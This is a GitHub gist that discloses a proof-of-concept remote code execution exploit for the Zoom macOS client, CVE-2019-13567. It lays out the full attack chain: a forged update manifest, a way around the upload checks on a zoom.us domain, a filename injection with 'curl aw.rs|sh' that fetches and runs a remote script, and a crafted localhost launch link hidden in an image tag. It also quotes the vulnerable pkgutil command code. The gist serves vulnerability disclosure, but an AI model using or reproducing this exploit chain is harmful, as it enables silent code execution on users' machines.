Skip to content

Instantly share code, notes, and snippets.

@wbowling
Last active January 1, 2022 22:33
Show Gist options
  • Save wbowling/13f9f90365c171806b9ffba2c841026b to your computer and use it in GitHub Desktop.
Save wbowling/13f9f90365c171806b9ffba2c841026b to your computer and use it in GitHub Desktop.
Zoom RCE - CVE-2019-13567

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg

  2. Use .htaccess (or any other method) to change the filename of the malicious package pointed to by Package-url in the manifest:

Header set Content-Disposition 'attachment; filename="aaaa$(curl aw.rs|sh).pkg"'
  1. Create a malicous link to hit the local zoom webserver. To bypass the domain checks it must be a valid subdomain for zoom.us and also end with zoom.us. This is still allows use to create a link to our manifest hosted on marketplacecontent.zoom.us: http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us

  2. Create an image with the link and host is somewhere:

<img src="http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us">

The RCE is possible due to the download url being created with:

[NSString stringWithFormat:@"https://%@/upgrade?os=mac", domain]

This allows for any link to be created, it just needs to be a valid subdomain (host is checked on the generated url) and also end with a valid subdomain.

After downloading the manifest, the package is downloaded and the signature is checked with:

NSString *cmd = [NSString stringWithFormat:@"pkgutil --check-signature \"%@\"", filename];
[cmd runAsCommand]

This allows for trivial command injection in via a malicious filename

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment